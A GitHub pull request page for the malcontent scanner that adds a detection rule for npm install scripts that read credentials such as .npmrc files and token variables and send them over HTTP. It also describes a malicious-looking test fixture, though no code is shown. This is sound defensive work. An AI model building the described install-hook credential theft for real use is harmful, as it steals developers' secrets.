Skip to content

Detect npm credential exfil in install scripts#1501

Merged
egibs merged 4 commits into
chainguard-dev:mainfrom
Big-Comfy:npm-credential-exfil-rule
May 6, 2026
Merged

Detect npm credential exfil in install scripts#1501
egibs merged 4 commits into
chainguard-dev:mainfrom
Big-Comfy:npm-credential-exfil-rule

Conversation

@Big-Comfy
Copy link
Copy Markdown
Contributor

@Big-Comfy Big-Comfy commented May 4, 2026
edited
Loading

Adds a high-risk npm rule for install-time scripts that touch package-manager credentials and also send data over HTTP.

I added a small fixture/test with a postinstall script that reads .npmrc / token env vars and posts them, plus a release-script fixture that mentions NPM_TOKEN but should stay quiet.

The rule metadata also links Unit 42's Shai-Hulud writeup, since that attack used npm install hooks to harvest and exfiltrate developer credentials.

I also opened chainguard-sandbox/malcontent-samples#52 so this can be covered by the sample-output tests once that sample lands.

Checked:

  • make yara-x-compile
  • local YARA-X scan against the positive and negative fixtures

@Big-Comfy Big-Comfy closed this May 4, 2026
@Big-Comfy Big-Comfy force-pushed the npm-credential-exfil-rule branch from 7a54f42 to e695690 Compare May 4, 2026 14:22
@Big-Comfy Big-Comfy reopened this May 4, 2026
Big-Comfy added 2 commits May 4, 2026 18:52
@Big-Comfy
Detect npm credential exfil in install scripts
67885ac 
Signed-off-by: Nikhil <tad.areas_0y@icloud.com>
@Big-Comfy
Add npm credential exfiltration test fixture
149bbbe 
Signed-off-by: Nikhil <tad.areas_0y@icloud.com>
@Big-Comfy Big-Comfy force-pushed the npm-credential-exfil-rule branch from 1ff6cf2 to 149bbbe Compare May 4, 2026 17:52
@Big-Comfy Big-Comfy mentioned this pull request May 4, 2026
Merged
egibs
egibs approved these changes May 6, 2026
View reviewed changes
Copy link
Copy Markdown
Member

@egibs egibs left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the contribution!

@egibs egibs merged commit b4bc5cb into chainguard-dev:main May 6, 2026
18 checks passed
@egibs egibs mentioned this pull request May 6, 2026
Merged
@Big-Comfy Big-Comfy deleted the npm-credential-exfil-rule branch May 6, 2026 18:19
@BrewTestBot BrewTestBot mentioned this pull request May 6, 2026
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@egibs egibs egibs approved these changes

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@Big-Comfy @egibs